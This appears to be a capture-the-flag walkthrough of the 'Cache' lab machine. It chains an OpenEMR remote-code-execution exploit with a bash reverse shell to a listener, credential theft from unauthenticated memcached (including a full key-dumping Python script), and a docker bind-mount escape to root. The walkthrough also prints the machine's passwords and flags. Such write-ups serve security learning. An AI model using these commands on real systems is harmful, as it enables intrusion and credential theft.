Cache is a Linux box at 10.10.10.188. Let's start with an nmap scan and some enumeration.
#nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6CE8D3334381134EB0A89D8FECE6EEB2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Visiting the web service on port 80, we found a JS file that contains a username and password (credentials hard-coded in client-side script are readable by anyone who loads the page). Logging in with them led nowhere, but after a while the site gave a hint about "hms", so we added hms.htb to /etc/hosts. That virtual host serves OpenEMR.
Exploit: https://www.exploit-db.com/exploits/45161 (authenticated OpenEMR remote code execution; it needs a valid OpenEMR account, here openemr_admin, whose password is redacted below). The -c argument is the command the target runs, in this case a bash reverse shell back to our listener on 10.10.15.185:1337.
$ python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.15.185/1337 0>&1'

Listen with nc and we are in the system. 🙂
#user flag
Upgrade the dumb shell to a TTY with python3 -c 'import pty; pty.spawn("/bin/sh")' (without it there is no job control, as the bash warnings below show).
$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.15.185] from hms.htb [10.10.10.188] 41960
bash: cannot set terminal process group (2086): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$
There are two users in /home. One of them, ash, is the user whose credentials were in the JS file, so su to ash and read user.txt.
$ cd /home
$ ls
ash  luffy
$ su ash
Password: H@v3_fun
ash@cache:/home$ ls
ash  luffy
ash@cache:/home$ cd ash
ash@cache:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  user.txt
ash@cache:~$ cat user.txt
ba3ad6c2fb35d648301680f2b2b8dc34
Listing listening sockets shows a service bound to localhost on port 11211. That is memcached's default port, not telnet; telnet is just a convenient client for its plain-text protocol. Memcached has no authentication, so any local user (including the web server account we landed as) can read whatever the application has cached.
ash@cache:~$ ss -tnl
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.53%lo:53     0.0.0.0:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128     127.0.0.1:11211      0.0.0.0:*
LISTEN  0       128     *:80                 *:*
LISTEN  0       128     [::]:22              [::]:*
Connect with telnet and ask for the passwd key: the value is 0n3_p1ec3, which is luffy's password. (If you do not know the key names, memcached will list them for you: "stats items" shows the slab ids and "stats cachedump <slab> 0" dumps the keys in each slab.)
ash@cache:~$ telnet localhost 11211
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
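The telnet session above guesses the key name. As an added example (not code from the original writeup), here is a small memcached text-protocol client that enumerates every key with "stats items" and "stats cachedump" and then fetches the values with "get", so nothing has to be guessed. The parsers are split from the socket code so they can be exercised offline; the host/port defaults, the 50-key batch size and the sample response in the main block are assumptions, and "stats cachedump" is a deprecated command (newer memcached builds expose "lru_crawler metadump all" instead).

```python
"""Dump every key/value from an unauthenticated memcached instance."""
import socket
from typing import Dict, List


def parse_slab_ids(stats_items: bytes) -> List[int]:
    """Extract slab ids from a `stats items` response (STAT items:<slab>:<name> <value>)."""
    ids = set()
    for line in stats_items.split(b"\r\n"):
        if line.startswith(b"STAT items:"):
            ids.add(int(line.split(b":")[1]))
    return sorted(ids)


def parse_cachedump(resp: bytes) -> List[str]:
    """Extract key names from a `stats cachedump` response (ITEM <key> [<n> b; <exp> s])."""
    return [line.split(b" ", 2)[1].decode()
            for line in resp.split(b"\r\n") if line.startswith(b"ITEM ")]


def parse_get(resp: bytes) -> Dict[str, bytes]:
    """Parse `VALUE <key> <flags> <bytes>[ <cas>]\\r\\n<data>\\r\\n ... END\\r\\n`.

    The declared byte count is honoured, so values that themselves contain
    CRLF or the word END are returned intact.
    """
    values: Dict[str, bytes] = {}
    pos = 0
    while True:
        end = resp.index(b"\r\n", pos)
        header = resp[pos:end]
        if header == b"END":
            return values
        parts = header.split(b" ")
        if parts[0] != b"VALUE":
            raise ValueError(f"unexpected response line: {header!r}")
        key, length = parts[1].decode(), int(parts[3])
        start = end + 2
        values[key] = resp[start:start + length]
        pos = start + length + 2  # step over the data's trailing CRLF


def _command(sock: socket.socket, cmd: bytes) -> bytes:
    """Send one command and read until the END terminator.

    Error replies (ERROR / CLIENT_ERROR ...) carry no END, so a bad command
    surfaces as a socket timeout rather than hanging forever.
    """
    sock.sendall(cmd + b"\r\n")
    buf = b""
    while not buf.endswith(b"END\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("memcached closed the connection")
        buf += chunk
    return buf


def dump_all(host: str = "127.0.0.1", port: int = 11211, timeout: float = 5.0) -> Dict[str, bytes]:
    """Connect to memcached and return every cached key with its value."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        keys: List[str] = []
        for slab in parse_slab_ids(_command(s, b"stats items")):
            # limit 0 means "all items in this slab"
            keys += parse_cachedump(_command(s, b"stats cachedump %d 0" % slab))
        found: Dict[str, bytes] = {}
        for i in range(0, len(keys), 50):  # multi-get in batches of 50 (assumed batch size)
            batch = " ".join(keys[i:i + 50]).encode()
            found.update(parse_get(_command(s, b"get " + batch)))
        return found


if __name__ == "__main__":
    # Constructed sample response (not captured from the box) to show the parser.
    sample = b"VALUE passwd 0 9\r\n0n3_p1ec3\r\nVALUE user 0 5\r\nluffy\r\nEND\r\n"
    for key, value in parse_get(sample).items():
        print(f"{key} = {value.decode(errors='replace')}")
    # Against a live instance: print(dump_all("127.0.0.1", 11211))
```

Run it on the box (it only needs the Python 3 standard library, which was already there for the pty trick) to get every cached key and value in one go; the same enumeration is what makes an unauthenticated memcached reachable by untrusted users a credential leak rather than a cache.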
#root flag
After logging in as luffy, privilege escalation is straightforward: luffy can talk to the Docker daemon (normally a sign of docker group membership), and because the daemon runs as root, anyone who can start a container can bind-mount the host's root filesystem into it and chroot in. The resulting shell is root on the host, not just inside the container, so docker access is equivalent to root.
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
bin  boot  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  swap.img  sys  tmp  usr  var  vmlinuz  vmlinuz.old
# cd root
# ls
root.txt
# cat root.txt
13075205f94778ab0de9e50946e11c7e